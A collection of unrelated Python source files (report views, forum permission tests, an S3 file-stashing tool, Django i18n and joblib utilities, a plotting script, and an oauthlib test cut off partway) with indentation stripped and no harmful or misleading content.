class ADMSectionView(GenericReportView):
section_name = ugettext_noop("Active Data Management")
base_template = "reports/base_template.html"
dispatcher = ADMSectionDispatcher
hide_filters = True
emailable = True
# adm-specific stuff
adm_slug = None
def __init__(self, request, base_context=None, domain=None, **kwargs):
self.adm_sections = dict(REPORT_SECTION_OPTIONS)
if self.adm_slug not in self.adm_sections:
raise ValueError("The adm_slug provided, %s, is not in the list of valid ADM report section slugs: %s." %
(self.adm_slug, ", ".join([key for key, val in self.adm_sections.items()]))
)
self.subreport_slug = kwargs.get("subreport_slug")
super(ADMSectionView, self).__init__(request, base_context, domain=domain, **kwargs)
self.context['report'].update(sub_slug=self.subreport_slug)
if self.subreport_data:
self.name = mark_safe("""%s <small>%s</small>""" %\
(self.subreport_data.get('value', {}).get('name'),
self.adm_sections.get(self.adm_slug, _("ADM Report"))))
@property
def subreport_data(self):
raise NotImplementedError
@property
def default_report_url(self):
return reverse('default_adm_report', args=[self.request.project])
@classmethod
def get_url(cls, domain=None, render_as=None, **kwargs):
subreport = kwargs.get('subreport')
url = super(ADMSectionView, cls).get_url(domain=domain, render_as=render_as, **kwargs)
return "%s%s" % (url, "%s/" % subreport if subreport else "")
class DefaultReportADMSectionView(GenericTabularReport, ADMSectionView, ProjectReportParametersMixin, DatespanMixin):
section_name = ugettext_noop("Active Data Management")
base_template = "reports/base_template.html"
dispatcher = ADMSectionDispatcher
fix_left_col = True
fields = ['corehq.apps.reports.filters.users.UserTypeFilter',
'corehq.apps.reports.filters.select.GroupFilter',
'corehq.apps.reports.filters.dates.DatespanFilter']
hide_filters = False
# adm-specific stuff
adm_slug = None
@property
@memoized
def subreport_data(self):
default_subreport = ADMReport.get_default(self.subreport_slug, domain=self.domain,
section=self.adm_slug, wrap=False)
if default_subreport is None:
return dict()
return default_subreport
@property
@memoized
def adm_report(self):
if self.subreport_data:
try:
adm_report = ADMReport.get_correct_wrap(self.subreport_data.get('key')[-1])
adm_report.set_domain_specific_values(self.domain)
return adm_report
except Exception as e:
logging.error("Could not fetch ADM Report: %s" % e)
return None
@property
@memoized
def adm_columns(self):
if self.adm_report:
column_config = self.report_column_config
if not isinstance(column_config, dict):
ValueError('report_column_config should return a dict')
for col in self.adm_report.columns:
col.set_report_values(**column_config)
return self.adm_report.columns
return []
@property
def headers(self):
if self.subreport_slug is None:
raise ValueError("Cannot render this report. A subreport_slug is required.")
header = DataTablesHeader(DataTablesColumn(_("FLW Name")))
for col in self.adm_report.columns:
sort_type = DTSortType.NUMERIC if hasattr(col, 'returns_numerical') and col.returns_numerical else None
help_text = _(col.description) if col.description else None
header.add_column(DataTablesColumn(_(col.name), sort_type=sort_type, help_text=help_text))
header.custom_sort = self.adm_report.default_sort_params
return header
@property
def rows(self):
rows = []
for user in self.users:
row = [self.table_cell(user.raw_username,
user.username_in_report)]
for col in self.adm_columns:
val = col.raw_value(**user._asdict())
row.append(self.table_cell(col.clean_value(val),
col.html_value(val)))
rows.append(row)
self.statistics_rows = [["Total"], ["Average"]]
for ind, col in enumerate(self.adm_columns):
column_data = [row[1+ind] for row in rows]
self.statistics_rows[0].append(col.calculate_totals(column_data))
self.statistics_rows[1].append(col.calculate_averages(column_data))
return rows
@property
def report_column_config(self):
"""
Should return a dict of values important for rendering the ADMColumns in this report.
"""
return dict(
domain=self.domain,
datespan=self.datespan
)
@classmethod
def override_navigation_list(cls, context):
current_slug = context.get('report', {}).get('sub_slug')
domain = context.get('domain')
subreport_context = []
subreports = ADMReport.get_default_subreports(domain, cls.adm_slug)
if not subreports:
subreport_context.append({
'url': '#',
'warning_label': 'No ADM Reports Configured',
})
return subreport_context
for report in subreports:
key = report.get("key", [])
entry = report.get("value", {})
report_slug = key[-2]
if cls.show_subreport_in_navigation(report_slug):
subreport_context.append({
'is_active': current_slug == report_slug,
'url': cls.get_url(domain=domain, subreport=report_slug),
'description': entry.get('description', ''),
'title': entry.get('name', 'Untitled Report'),
})
return subreport_context
@classmethod
def show_subreport_in_navigation(cls, subreport_slug):
return True
|
"""
This test will use the default permissions found in
flaskbb.utils.populate
"""
from flaskbb.utils.permissions import *
def test_moderator_permissions_in_forum(
forum, moderator_user, topic, topic_moderator):
"""Test the moderator permissions in a forum where the user is a
moderator.
"""
assert moderator_user in forum.moderators
assert can_post_reply(moderator_user, forum)
assert can_post_topic(moderator_user, forum)
assert can_edit_post(moderator_user, topic.user_id, forum)
assert can_moderate(moderator_user, forum)
assert can_delete_post(moderator_user, topic.user_id, forum)
assert can_delete_topic(moderator_user, topic.user_id, forum)
def test_moderator_permissions_without_forum(
forum, moderator_user, topic, topic_moderator):
"""Test the moderator permissions in a forum where the user is not a
moderator.
"""
forum.moderators.remove(moderator_user)
assert not moderator_user in forum.moderators
assert not can_moderate(moderator_user, forum)
assert can_post_reply(moderator_user, forum)
assert can_post_topic(moderator_user, forum)
assert not can_edit_post(moderator_user, topic.user_id, forum)
assert not can_delete_post(moderator_user, topic.user_id, forum)
assert not can_delete_topic(moderator_user, topic.user_id, forum)
# Test with own topic
assert can_delete_post(moderator_user, topic_moderator.user_id, forum)
assert can_delete_topic(moderator_user, topic_moderator.user_id, forum)
assert can_edit_post(moderator_user, topic_moderator.user_id, forum)
# Test moderator permissions
assert can_edit_user(moderator_user)
assert can_ban_user(moderator_user)
def test_normal_permissions(forum, user, topic):
"""Test the permissions for a normal user."""
assert not can_moderate(user, forum)
assert can_post_reply(user, forum)
assert can_post_topic(user, forum)
assert can_edit_post(user, topic.user_id, forum)
assert not can_delete_post(user, topic.user_id, forum)
assert not can_delete_topic(user, topic.user_id, forum)
assert not can_edit_user(user)
assert not can_ban_user(user)
def test_admin_permissions(forum, admin_user, topic):
"""Test the permissions for a admin user."""
assert can_moderate(admin_user, forum)
assert can_post_reply(admin_user, forum)
assert can_post_topic(admin_user, forum)
assert can_edit_post(admin_user, topic.user_id, forum)
assert can_delete_post(admin_user, topic.user_id, forum)
assert can_delete_topic(admin_user, topic.user_id, forum)
assert can_edit_user(admin_user)
assert can_ban_user(admin_user)
def test_super_moderator_permissions(forum, super_moderator_user, topic):
"""Test the permissions for a super moderator user."""
assert can_moderate(super_moderator_user, forum)
assert can_post_reply(super_moderator_user, forum)
assert can_post_topic(super_moderator_user, forum)
assert can_edit_post(super_moderator_user, topic.user_id, forum)
assert can_delete_post(super_moderator_user, topic.user_id, forum)
assert can_delete_topic(super_moderator_user, topic.user_id, forum)
assert can_edit_user(super_moderator_user)
assert can_ban_user(super_moderator_user)
def test_can_moderate_without_permission(moderator_user):
"""Test can moderate for a moderator_user without a permission."""
assert can_moderate(moderator_user) == False
|
""" md5s3stash
content addressable storage in AWS S3
"""
from __future__ import unicode_literals
import sys
import os
import argparse
import tempfile
import urllib2
import urllib
import urlparse
import base64
import logging
import hashlib
import basin
import boto
import magic
from PIL import Image
from collections import namedtuple
import re
regex_s3 = re.compile(r's3.*amazonaws.com')
def main(argv=None):
parser = argparse.ArgumentParser(
description='content addressable storage in AWS S3')
parser.add_argument('url', nargs='+',
help='URL or path of source file to stash')
parser.add_argument('-b', '--bucket_base', nargs="?",
help='this must be a unique name in all of AWS S3')
parser.add_argument('-s', '--bucket_scheme', nargs="?",
default="simple", choices=['simple', 'multivalue'],
help='this must be a unique name in all of AWS S3')
parser.add_argument(
'-t', '--tempdir',
required=False,
help="if your files might be large, make sure this is on a big disk"
)
parser.add_argument(
'-w', '--warnings',
default=False,
help='show python `DeprecationWarning`s supressed by default',
required=False,
action='store_true',
)
parser.add_argument('--loglevel', default='ERROR', required=False)
parser.add_argument('-u', '--username', required=False,
help='username for downloads requiring BasicAuth')
parser.add_argument('-p', '--password', required=False,
help='password for downloads requiring BasicAuth')
if argv is None:
argv = parser.parse_args()
if argv.bucket_base:
bucket_base = argv.bucket_base
else:
assert 'BUCKET_BASE' in os.environ, "`-b` or `BUCKET_BASE` must be set"
bucket_base = os.environ['BUCKET_BASE']
if not argv.warnings:
# supress warnings
# http://stackoverflow.com/a/2047600/1763984
import warnings
warnings.simplefilter("ignore", DeprecationWarning)
if argv.tempdir:
tempfile.tempdir = argv.tempdir
auth = None
if argv.username:
auth = (argv.username, argv.password)
# set debugging level
numeric_level = getattr(logging, argv.loglevel.upper(), None)
if not isinstance(numeric_level, int):
raise ValueError('Invalid log level: %s' % argv.loglevel)
logging.basicConfig(level=numeric_level, )
# if being used in a library, probably want to be able to recycle
# connection?
conn = boto.connect_s3()
for url in argv.url:
print("{0}\t{1}\t{2}\t{3}".format(
*md5s3stash(url, bucket_base, conn, url_auth=auth, bucket_scheme=argv.bucket_scheme)
))
def md5s3stash(
url,
bucket_base,
conn=None,
url_auth=None,
url_cache={},
hash_cache={},
bucket_scheme='simple'
):
""" stash a file at `url` in the named `bucket_base` ,
`conn` is an optional boto.connect_s3()
`url_auth` is optional Basic auth ('<username>', '<password'>) tuple
to use if the url to download requires authentication.
`url_cache` is an object with a dict interface, keyed on url
url_cache[url] = { md5: ..., If-None-Match: etag, If-Modified-Since: date }
`hash_cache` is an obhect with dict interface, keyed on md5
hash_cache[md5] = ( s3_url, mime_type, dimensions )
`bucket_scheme` is text string 'simple' or 'multibucket'
"""
StashReport = namedtuple('StashReport', 'url, md5, s3_url, mime_type, dimensions')
(file_path, md5, mime_type) = checkChunks(url, url_auth, url_cache)
try:
return StashReport(url, md5, *hash_cache[md5])
except KeyError:
pass
s3_url = md5_to_s3_url(md5, bucket_base, bucket_scheme=bucket_scheme)
if conn is None:
conn = boto.connect_s3()
s3move(file_path, s3_url, mime_type, conn)
(mime, dimensions) = image_info(file_path)
os.remove(file_path) # safer than rmtree
hash_cache[md5] = (s3_url, mime, dimensions)
report = StashReport(url, md5, *hash_cache[md5])
logging.getLogger('MD5S3:stash').info(report)
return report
def md5_to_s3_url(md5, bucket_base, bucket_scheme='multibucket'):
""" calculate the s3 URL given an md5 and an bucket_base """
if bucket_scheme == 'simple':
url = "s3://{0}/{1}".format(
bucket_base,
md5
)
elif bucket_scheme == 'multibucket':
url = "s3://{0}.{1}/{2}".format(
md5_to_bucket_shard(md5),
bucket_base,
md5
)
return url
def md5_to_http_url(md5, bucket_base, bucket_scheme='multibucket', s3_endpoint='s3.amazonaws.com'):
""" calculate the http URL given an md5 and an bucket_base """
if bucket_scheme == 'simple':
url = "http://{0}/{1}/{2}".format(
s3_endpoint,
bucket_base,
md5
)
elif bucket_scheme == 'multibucket':
url = "http://{1}.{2}.{0}/{3}".format(
s3_endpoint,
md5_to_bucket_shard(md5),
bucket_base,
md5
)
return url
def md5_to_bucket_shard(md5):
""" calculate the shard label of the bucket name from md5 """
# "Consider utilizing multiple buckets that start with different
# alphanumeric characters. This will ensure a degree of partitioning
# from the start. The higher your volume of concurrent PUT and
# GET requests, the more impact this will likely have."
# -- http://aws.amazon.com/articles/1904
# "Bucket names must be a series of one or more labels. Adjacent
# labels are separated by a single period (.). [...] Each label must
# start and end with a lowercase letter or a number. "
# -- http://docs.aws.amazon.com/AmazonS3/latest/dev/BucketRestrictions.html
# see also: http://en.wikipedia.org/wiki/Base_36
ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyz"
# http://stats.stackexchange.com/a/70884/14900
# take the first two digits of the hash and turn that into an inteter
# this should be evenly distributed
int_value = int(md5[0], 16)+10*int(md5[1], 16)
# divide by the length of the alphabet and take the remainder
bucket = int_value % len(ALPHABET)
return basin.encode(ALPHABET, bucket)
def is_s3_url(url):
'''For s3 urls, if you send http authentication headers, S3 will
send a "400 Bad Request" in response.
Now look for s3*.amazonaws.com
'''
# moving to OR this will be s3-us-west-2.amazonaws.com
match = regex_s3.search(url)
return True if match else False
def urlopen_with_auth(url, auth=None, cache={}):
'''Use urllib2 to open url if the auth is specified.
auth is tuple of (username, password)
'''
opener = urllib2.build_opener(DefaultErrorHandler())
req = urllib2.Request(url)
p = urlparse.urlparse(url)
# try to set headers for conditional get request
try:
here = cache[url]
if 'If-None-Match' in here:
req.add_header('If-None-Match', cache[url]['If-None-Match'],)
if 'If-Modified-Since' in here:
req.add_header('If-Modified-Since', cache[url]['If-Modified-Since'],)
except KeyError:
pass
if not auth or is_s3_url(url):
if p.scheme not in ['http', 'https']:
return urllib.urlopen(url) # urllib works with normal file paths
else:
# make sure https
if p.scheme != 'https':
raise urllib2.URLError('Basic auth not over https is bad idea! \
scheme:{0}'.format(p.scheme))
# Need to add header so it gets sent with first request,
# else redirected to shib
b64authstr = base64.b64encode('{0}:{1}'.format(*auth))
req.add_header('Authorization', 'Basic {0}'.format(b64authstr))
# return urllib2.urlopen(req)
return opener.open(req)
def checkChunks(url, auth=None, cache={}):
"""
Helper to download large files the only arg is a url this file
will go to a temp directory the file will also be downloaded in
chunks and md5 checksum is returned
based on downloadChunks@https://gist.github.com/gourneau/1430932
and http://www.pythoncentral.io/hashing-files-with-python/
"""
temp_file = tempfile.NamedTemporaryFile(delete=False, prefix='md5s3_')
logging.getLogger('MD5S3').info("temp file path %s" % temp_file.name)
hasher = hashlib.new('md5')
BLOCKSIZE = 1024 * hasher.block_size
try:
req = urlopen_with_auth(url, auth=auth, cache=cache)
thisurl = cache.get(url, dict())
if req.getcode() == 304:
return None, thisurl['md5'], None
mime_type = req.info()['Content-type']
# record these headers, they will let us pretend like we are a cacheing
# proxy server, and send conditional GETs next time we see this file
etag = req.info().get('ETag', None);
if etag:
thisurl['If-None-Match'] = etag
lmod = req.info().get('Last-Modified', None);
if lmod:
thisurl['If-Modified-Since'] = lmod
downloaded = 0
with temp_file:
while True:
chunk = req.read(BLOCKSIZE)
hasher.update(chunk)
downloaded += len(chunk)
if not chunk:
break
temp_file.write(chunk)
except urllib2.HTTPError, e:
print "HTTP Error:", e.code, url
return False
except urllib2.URLError, e:
print "URL Error:", e.reason, url
return False
md5 = hasher.hexdigest()
thisurl['md5'] = md5
cache[url] = thisurl
return temp_file.name, md5, mime_type
def s3move(place1, place2, mime, s3):
l = logging.getLogger('MD5S3:s3move')
l.debug({
'place1': place1,
'place2': place2,
'mime': mime,
's3': s3,
})
parts = urlparse.urlsplit(place2)
# SplitResult(scheme='s3', netloc='test.pdf', path='/dkd', query=''
# , fragment='')
try:
bucket = s3.get_bucket(parts.netloc, validate=False)
l.debug('bucket exists')
except boto.exception.S3ResponseError:
bucket = s3.create_bucket(parts.netloc)
l.debug('bucket created')
if not(bucket.get_key(parts.path, validate=False)):
key = bucket.new_key(parts.path)
# metadata has to be set before setting contents/creating object.
# See https://gist.github.com/garnaat/1791086
key.set_metadata("Content-Type", mime)
key.set_contents_from_filename(place1)
# key.set_acl('public-read')
l.debug('file sent to s3')
else:
l.info('key existed already')
def image_info(filepath):
''' get image info
`filepath` path to a file
returns
a tuple of two values
1. mime/type if an image; otherwise None
2. a tuple of (height, width) if an image; otherwise (0,0)
'''
try:
return (
magic.Magic(mime=True).from_file(filepath),
Image.open(filepath).size
)
except IOError as e:
if not e.message.startswith('cannot identify image file'):
raise e
else:
return (None, (0,0))
class DefaultErrorHandler(urllib2.HTTPDefaultErrorHandler):
def http_error_304(self, req, fp, code, msg, headers):
result = urllib2.HTTPError(
req.get_full_url(), code, msg, headers, fp)
result.status = code
return result
if __name__ == "__main__":
sys.exit(main())
"""
Copyright (c) 2015, Regents of the University of California
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the {organization} nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
|
"""Jinja2's i18n functionality is not exactly the same as Django's.
In particular, the tags names and their syntax are different:
1. The Django ``trans`` tag is replaced by a _() global.
2. The Django ``blocktrans`` tag is called ``trans``.
(1) isn't an issue, since the whole ``makemessages`` process is based on
converting the template tags to ``_()`` calls. However, (2) means that
those Jinja2 ``trans`` tags will not be picked up my Django's
``makemessage`` command.
There aren't any nice solutions here. While Jinja2's i18n extension does
come with extraction capabilities built in, the code behind ``makemessages``
unfortunately isn't extensible, so we can:
* Duplicate the command + code behind it.
* Offer a separate command for Jinja2 extraction.
* Try to get Django to offer hooks into makemessages().
* Monkey-patch.
We are currently doing that last thing. It turns out there we are lucky
for once: It's simply a matter of extending two regular expressions.
Credit for the approach goes to:
http://stackoverflow.com/questions/2090717/getting-translation-strings-for-jinja2-templates-integrated-with-django-1-x
"""
import re
from django.core.management.commands import makemessages
from django.utils.translation import trans_real
class Command(makemessages.Command):
def handle(self, *args, **options):
old_endblock_re = trans_real.endblock_re
old_block_re = trans_real.block_re
# Extend the regular expressions that are used to detect
# translation blocks with an "OR jinja-syntax" clause.
trans_real.endblock_re = re.compile(
trans_real.endblock_re.pattern + '|' + r"""^\s*endtrans$""")
trans_real.block_re = re.compile(
trans_real.block_re.pattern + '|' + r"""^\s*trans(?:\s+(?!'|")(?=.*?=.*?)|$)""")
trans_real.plural_re = re.compile(
trans_real.plural_re.pattern + '|' + r"""^\s*pluralize(?:\s+.+|$)""")
try:
super(Command, self).handle(*args, **options)
finally:
trans_real.endblock_re = old_endblock_re
trans_real.block_re = old_block_re
|
import os.path as op
import numpy as np
from numpy.testing import assert_array_equal
import pytest
from mne.parallel import parallel_func
from mne.utils import ProgressBar, array_split_idx, use_log_level
def test_progressbar():
"""Test progressbar class."""
a = np.arange(10)
pbar = ProgressBar(a)
assert a is pbar.iterable
assert pbar.max_value == 10
pbar = ProgressBar(10)
assert pbar.max_value == 10
assert pbar.iterable is None
# Make sure that non-iterable input raises an error
def iter_func(a):
for ii in a:
pass
pytest.raises(Exception, iter_func, ProgressBar(20))
def _identity(x):
return x
def test_progressbar_parallel_basic(capsys):
"""Test ProgressBar with parallel computing, basic version."""
assert capsys.readouterr().out == ''
parallel, p_fun, _ = parallel_func(_identity, total=10, n_jobs=1,
verbose=True)
with use_log_level(True):
out = parallel(p_fun(x) for x in range(10))
assert out == list(range(10))
cap = capsys.readouterr()
out = cap.err
assert '100%' in out
def _identity_block(x, pb):
for ii in range(len(x)):
pb.update(ii + 1)
return x
def test_progressbar_parallel_advanced(capsys):
"""Test ProgressBar with parallel computing, advanced version."""
assert capsys.readouterr().out == ''
# This must be "1" because "capsys" won't get stdout properly otherwise
parallel, p_fun, _ = parallel_func(_identity_block, n_jobs=1,
verbose=False)
arr = np.arange(10)
with use_log_level(True):
with ProgressBar(len(arr)) as pb:
out = parallel(p_fun(x, pb.subset(pb_idx))
for pb_idx, x in array_split_idx(arr, 2))
assert op.isfile(pb._mmap_fname)
sum_ = np.memmap(pb._mmap_fname, dtype='bool', mode='r',
shape=10).sum()
assert sum_ == len(arr)
assert not op.isfile(pb._mmap_fname), '__exit__ not called?'
out = np.concatenate(out)
assert_array_equal(out, arr)
cap = capsys.readouterr()
out = cap.err
assert '100%' in out
def _identity_block_wide(x, pb):
for ii in range(len(x)):
for jj in range(2):
pb.update(ii * 2 + jj + 1)
return x, pb.idx
def test_progressbar_parallel_more(capsys):
"""Test ProgressBar with parallel computing, advanced version."""
assert capsys.readouterr().out == ''
# This must be "1" because "capsys" won't get stdout properly otherwise
parallel, p_fun, _ = parallel_func(_identity_block_wide, n_jobs=1,
verbose=False)
arr = np.arange(10)
with use_log_level(True):
with ProgressBar(len(arr) * 2) as pb:
out = parallel(p_fun(x, pb.subset(pb_idx))
for pb_idx, x in array_split_idx(
arr, 2, n_per_split=2))
idxs = np.concatenate([o[1] for o in out])
assert_array_equal(idxs, np.arange(len(arr) * 2))
out = np.concatenate([o[0] for o in out])
assert op.isfile(pb._mmap_fname)
sum_ = np.memmap(pb._mmap_fname, dtype='bool', mode='r',
shape=len(arr) * 2).sum()
assert sum_ == len(arr) * 2
assert not op.isfile(pb._mmap_fname), '__exit__ not called?'
cap = capsys.readouterr()
out = cap.err
assert '100%' in out
|
import inspect
from functools import partial
try:
from joblib.externals.cloudpickle import dumps, loads
cloudpickle = True
except ImportError:
cloudpickle = False
WRAP_CACHE = dict()
class CloudpickledObjectWrapper(object):
def __init__(self, obj, keep_wrapper=False):
self._obj = obj
self._keep_wrapper = keep_wrapper
def __reduce__(self):
_pickled_object = dumps(self._obj)
if not self._keep_wrapper:
return loads, (_pickled_object,)
return _reconstruct_wrapper, (_pickled_object, self._keep_wrapper)
def __getattr__(self, attr):
# Ensure that the wrapped object can be used seemlessly as the
# previous object.
if attr not in ['_obj', '_keep_wrapper']:
return getattr(self._obj, attr)
return getattr(self, attr)
class CallableObjectWrapper(CloudpickledObjectWrapper):
def __call__(self, *args, **kwargs):
return self._obj(*args, **kwargs)
def _wrap_non_picklable_objects(obj, keep_wrapper):
if callable(obj):
return CallableObjectWrapper(obj, keep_wrapper=keep_wrapper)
return CloudpickledObjectWrapper(obj, keep_wrapper=keep_wrapper)
def _reconstruct_wrapper(_pickled_object, keep_wrapper):
obj = loads(_pickled_object)
return _wrap_non_picklable_objects(obj, keep_wrapper)
def _wrap_objects_when_needed(obj):
# Function to introspect an object and decide if it should be wrapped or
# not.
if not cloudpickle:
return obj
need_wrap = "__main__" in getattr(obj, "__module__", "")
if isinstance(obj, partial):
return partial(
_wrap_objects_when_needed(obj.func),
*[_wrap_objects_when_needed(a) for a in obj.args],
**{k: _wrap_objects_when_needed(v)
for k, v in obj.keywords.items()}
)
if callable(obj):
# Need wrap if the object is a function defined in a local scope of
# another function.
func_code = getattr(obj, "__code__", "")
need_wrap |= getattr(func_code, "co_flags", 0) & inspect.CO_NESTED
# Need wrap if the obj is a lambda expression
func_name = getattr(obj, "__name__", "")
need_wrap |= "<lambda>" in func_name
if not need_wrap:
return obj
wrapped_obj = WRAP_CACHE.get(obj)
if wrapped_obj is None:
wrapped_obj = _wrap_non_picklable_objects(obj, keep_wrapper=False)
WRAP_CACHE[obj] = wrapped_obj
return wrapped_obj
def wrap_non_picklable_objects(obj, keep_wrapper=True):
"""Wrapper for non-picklable object to use cloudpickle to serialize them.
Note that this wrapper tends to slow down the serialization process as it
is done with cloudpickle which is typically slower compared to pickle. The
proper way to solve serialization issues is to avoid defining functions and
objects in the main scripts and to implement __reduce__ functions for
complex classes.
"""
if not cloudpickle:
raise ImportError("could not from joblib.externals import cloudpickle. Please install "
"cloudpickle to allow extended serialization. "
"(`pip install cloudpickle`).")
# If obj is a class, create a CloudpickledClassWrapper which instantiates
# the object internally and wrap it directly in a CloudpickledObjectWrapper
if inspect.isclass(obj):
class CloudpickledClassWrapper(CloudpickledObjectWrapper):
def __init__(self, *args, **kwargs):
self._obj = obj(*args, **kwargs)
self._keep_wrapper = keep_wrapper
CloudpickledClassWrapper.__name__ = obj.__name__
return CloudpickledClassWrapper
# If obj is an instance of a class, just wrap it in a regular
# CloudpickledObjectWrapper
return _wrap_non_picklable_objects(obj, keep_wrapper=keep_wrapper)
|
import math
import sys, re
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
from utils import *
from matplotlib import pylab
from scipy.stats import scoreatpercentile
pkt_size = 256
train_length = 6
class boxplotter(object):
def __init__(self, median, top, bottom, whisk_top=None,
whisk_bottom=None, extreme_top=None):
self.median = median
self.top = top
self.bott = bottom
self.whisk_top = whisk_top
self.whisk_bott = whisk_bottom
self.extreme_top = extreme_top
def draw_on(self, ax, index, box_color = "blue",
median_color = "red", whisker_color = "black"):
width = .7
w2 = width / 2
ax.broken_barh([(index - w2, width)],
(self.bott,self.top - self.bott),
facecolor="white",edgecolor=box_color, lw=0.5)
ax.broken_barh([(index - w2, width)],
(self.median,0),
facecolor="white", edgecolor=median_color, lw=0.5)
if self.whisk_top is not None:
ax.broken_barh([(index - w2, width)],
(self.whisk_top,0),
facecolor="white", edgecolor=whisker_color, lw=0.5)
ax.broken_barh([(index , 0)],
(self.whisk_top, self.top-self.whisk_top),
edgecolor=box_color,linestyle="solid", lw=0.5)
if self.whisk_bott is not None:
ax.broken_barh([(index - w2, width)],
(self.whisk_bott,0),
facecolor="white", edgecolor=whisker_color, lw=0.5)
ax.broken_barh([(index , 0)],
(self.whisk_bott,self.bott-self.whisk_bott),
edgecolor=box_color,linestyle="solid", lw=0.5)
if self.extreme_top is not None:
ax.scatter([index], [self.extreme_top], marker='*',
lw=0.5)
def percentile_box_plot(ax, data, indexer=None, box_top=75,
box_bottom=25,whisker_top=99,whisker_bottom=1):
if indexer is None:
indexed_data = zip(range(1,len(data)+1), data)
else:
indexed_data = [(indexer(datum), datum) for datum in data]
def get_whisk(vector, w):
if w is None:
return None
return scoreatpercentile(vector, w)
for index, x in indexed_data:
bp = boxplotter(scoreatpercentile(x, 50),
scoreatpercentile(x, box_top),
scoreatpercentile(x, box_bottom),
get_whisk(x, whisker_top),
get_whisk(x, whisker_bottom),
scoreatpercentile(x, 100))
bp.draw_on(ax, index)
def worst_case_approx(setups, trainlength, plength):
base_worst = 4.0 * 3
#base_worst = 0.566
#packet_time = (plength + 18.0) * 8.0 / 10.0 / 1000.0
packet_time = plength * 8.0 / 10.0 / 1000.0
tmp = [x * (packet_time * trainlength) for x in setups]
worst = [x + base_worst for x in tmp]
for i in range(len(worst)):
print "WORST CASE %d: %f" % (setups[i], worst[i])
return worst
if len(sys.argv) < 2:
print "usage: plot_switch_experiment.py <input dir1> <input1 label> " \
"<input dir2> <input2 label> ... <output file>"
sys.exit(1)
paper_mode = True
if paper_mode:
set_paper_rcs()
if (len(sys.argv) - 1) % 2 == 1:
# odd number of args, have output name
outname = sys.argv[-1]
print "Output name specified: %s" % (outname)
else:
print "Please specify an output name!"
sys.exit(1)
inputdirs = []
labels = []
for i in range(1, len(sys.argv)-1, 2):
inputdirs.append(sys.argv[i])
labels.append(sys.argv[i+1])
data = []
negs_ignored = 0
for indir in inputdirs:
ds = []
for line in open(indir).readlines():
#for line in open(indir).readlines():
if line.strip() == "":
continue
val = float(line.strip()) / 1000.0
if val > 0:
ds.append(val)
else:
negs_ignored += 1
data.append(ds)
print "Ignored %d negative latency values!" % (negs_ignored)
fig = plt.figure(figsize=(3.33,2.22))
fig, ax = plt.subplots(figsize=(3.33,2.22))
pos = np.array(range(len(data)))+1
plt.plot(pos, [np.mean(x) for x in data], marker='+', label='average',
lw=1.0, color='g')
plt.plot(pos, [np.percentile(x, 99) for x in data], marker='v',
label='99\\textsuperscript{th}\%ile',
lw=1.0, color='y', mfc='none', mec='y', mew=1.0)
plt.scatter(pos, [max(x) for x in data], marker='x',
label='100\\textsuperscript{th}\%ile',
lw=1.0, color='r')
worst_case_approximation = worst_case_approx([10], train_length, pkt_size)[0]
wc_line = plt.axhline(worst_case_approximation, ls=':', color='r', lw=1.0)
first_legend = plt.legend(loc='upper left', frameon=False, handletextpad=0.1,
borderaxespad=0.05)
plt.gca().add_artist(first_legend)
plt.legend([wc_line], ["latency bound"], frameon=False, loc='upper center',
borderaxespad=0.05, handletextpad=0.1)
ax.set_xlabel('Throughput factor $f$')
ax.set_ylabel('End-to-end latency [$\mu$s]')
plt.ylim(0, 30.0)
plt.yticks(range(0, 31, 5), [str(x) for x in range(0, 31, 5)])
plt.xlim(0, len(inputdirs) + 1)
plt.xticks(range(pos[0], pos[-1] + 1, len(pos) / 5),
[round(worst_case_approximation / float(labels[i-1]), 1)
for i in range(pos[0], pos[-1] + 1, len(pos) / 5)])
plt.axvspan(0, 5, facecolor='0.8', alpha=0.5, zorder=0, lw=0.0)
plt.axvspan(20.5, 23, facecolor='0.8', alpha=0.5, zorder=0, lw=0.0)
plt.text(2, 31, "\\textbf{A}", fontsize=12)
plt.text(13, 31, "\\textbf{B}", fontsize=12)
plt.text(21.3, 31, "\\textbf{C}", fontsize=12)
plt.savefig(outname, format="pdf", bbox_inches='tight', pad_inches=0.01)
|
from __future__ import unicode_literals, absolute_import
from mock import MagicMock
from ....unittest import TestCase
from oauthlib.oauth1 import RequestValidator
from oauthlib.oauth1.rfc5849 import errors
from oauthlib.oauth1.rfc5849.endpoints import AuthorizationEndpoint
class ResourceEndpointTest(TestCase):
def setUp(self):
self.validator = MagicMock(wraps=RequestValidator())
self.validator.verify_request_token.return_value = True
self.validator.verify_realms.return_value = True
self.validator.get_realms.return_value = ['test']
self.validator.save_verifier = MagicMock()
self.endpoint = AuthorizationEndpoint(self.validator)
self.uri = 'https://i.b/authorize?oauth_token=foo'
def test_get_realms_and_credentials(self):
realms, credentials = self.endpoint.get_realms_and_credentials(self.uri)
self.assertEqual(realms, ['test'])
def test_verify_token(self):
self.validator.verify_request_token.return_value = False
self.assertRaises(errors.InvalidClientError,
self.endpoint.get_realms_and_credentials, self.uri)
self.assertRaises(errors.InvalidClientError,
self.endpoint.create_authorization_response, self.uri)
def test_verify_realms(self):
self.validator.verify_realms.return_value = False
